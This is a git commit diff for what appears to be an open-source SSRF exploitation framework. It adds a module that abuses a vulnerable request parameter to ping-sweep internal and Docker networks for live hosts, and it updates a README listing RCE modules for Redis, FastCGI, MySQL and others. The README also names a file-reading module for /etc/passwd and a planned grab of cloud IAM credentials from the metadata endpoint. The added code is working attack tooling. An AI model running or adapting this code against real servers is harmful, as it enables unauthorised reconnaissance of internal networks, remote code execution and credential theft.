MODULE - Network scan : HTTP ping sweep of the network

2018-10-16 22:42:39 +02:00 · 2018-10-16 22:42:39 +02:00 · ed066d4622
parent 65c73647f8
commit ed066d4622
3 changed files with 79 additions and 1 deletions
--- a/README.md
+++ b/README.md
@ -49,7 +49,11 @@ The following modules are already implemented and can be used with the `-m` argu
 | `fastcgi`      | FastCGI RCE |
 | `redis`        | Redis RCE |
 | `github`       | Github Enterprise RCE < 2.8.7 |
+| `zaddix`        | Zaddix RCE |
+| `mysql`        | MySQL Command execution |
+| `smtp`        | SMTP send mail |
 | `portscan`     | Scan ports for the host |
+| `networkscan`    | HTTP Ping sweep over the network |
 | `readfiles`    | Read files such as `/etc/passwd` |

 ## Contribute
@ -58,7 +62,6 @@ I <3 pull requests :)
 Feel free to add any feature listed below or a new service.

 - --level arg - ability to tweak payloads in order to bypass some IDS/WAF. E.g: `127.0.0.1 -> [::] -> 0000: -> ...`
- networkscan - same a portscan, we want to discover machines in the same network
 - aws and other cloud providers - extract sensitive data from http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy and more
 - sockserver  - SSRF SOCK proxy server - https://github.com/iamultra/ssrfsocks
 - handle request with file in requester
--- a/modules/mysql.py
+++ b/modules/mysql.py
@ -10,6 +10,7 @@ author      = "Swissky"
 # https://spyclub.tech/2018/ssrf-through-gopher/
 # https://github.com/eboda/34c3ctf/tree/master/extract0r
 # https://infosec.rm-it.de/2018/07/29/isitdtu-ctf-2018-friss/
+# http://shaobaobaoer.cn/archives/643/gopher-8de8ae-ssrf-mysql-a0e7b6

 # Note
 # This exploit is a Python 3 version of the Gopherus tool
--- a/modules/networkscan.py
+++ b/modules/networkscan.py
@ -0,0 +1,74 @@
+"""
+network scan 
+
+╭─swissky@crashlab ~  
+╰─$ curl -v "http://192.168.43.57"
+* Rebuilt URL to: http://192.168.43.57/
+*   Trying 192.168.43.57...
+* TCP_NODELAY set
+* connect to 192.168.43.57 port 80 failed: Connexion refusée
+* Failed to connect to 192.168.43.57 port 80: Connexion refusée
+* Closing connection 0
+curl: (7) Failed to connect to 192.168.43.57 port 80: Connexion refusée
+╭─swissky@crashlab ~  
+╰─$ curl -v "http://192.168.43.56"                                                                                                                                          7 ↵
+* Rebuilt URL to: http://192.168.43.56/
+*   Trying 192.168.43.56...
+* TCP_NODELAY set
+* connect to 192.168.43.56 port 80 failed: Aucun chemin d'accès pour atteindre l'hôte cible
+* Failed to connect to 192.168.43.56 port 80: Aucun chemin d'accès pour atteindre l'hôte cible
+* Closing connection 0
+curl: (7) Failed to connect to 192.168.43.56 port 80: Aucun chemin d'accès pour atteindre l'hôte cible
+╭─swissky@crashlab ~  
+"""
+from core.utils import *
+from datetime import datetime
+import sys, struct, socket
+import logging
+import concurrent.futures
+
+name        = "networkscan"
+description = "Scan the network - HTTP Ping sweep"
+author      = "Swissky"
+
+class exploit():
+    ips = set()
+
+    def __init__(self, requester, args):
+        logging.info("Module '{}' launched !".format(name))
+
+        # concurrent requests in order to limit the time
+        self.add_range("192.168.1.0/24")  # Default network 
+        self.add_range("192.168.0.0/24")  # Default network 
+        self.add_range("172.17.0.0/16")   # Docker network
+        self.add_range("172.18.0.0/16")   # Docker network
+        
+        with concurrent.futures.ThreadPoolExecutor(max_workers=None) as executor:
+            future_to_url = {executor.submit(self.concurrent_request, requester, args.param, ip, "80"): ip for ip in self.ips}
+
+
+    def add_range(self, ip_cidr):
+        (ip, cidr) = ip_cidr.split('/')
+        cidr = int(cidr) 
+        host_bits = 32 - cidr
+        i = struct.unpack('>I', socket.inet_aton(ip))[0] # note the endianness
+        start = (i >> host_bits) << host_bits # clear the host bits
+        end = start | ((1 << host_bits) - 1)
+
+        # excludes the first and last address in the subnet
+        for i in range(start, end):
+            self.ips.add(socket.inet_ntoa(struct.pack('>I',i)))
+
+
+    def concurrent_request(self, requester, param, host, port):
+        try:
+            payload = wrapper_http("", host, port.strip())
+            r = requester.do_request(param, payload)
+        
+            if not "Connection refused" in r.text:
+                timer = datetime.today().time().replace(microsecond=0)
+                print("\t[{}] Found host :{}".format(timer, host+ " "*40))
+
+            timer = datetime.today().time().replace(microsecond=0)
+        except Exception as e:
+            pass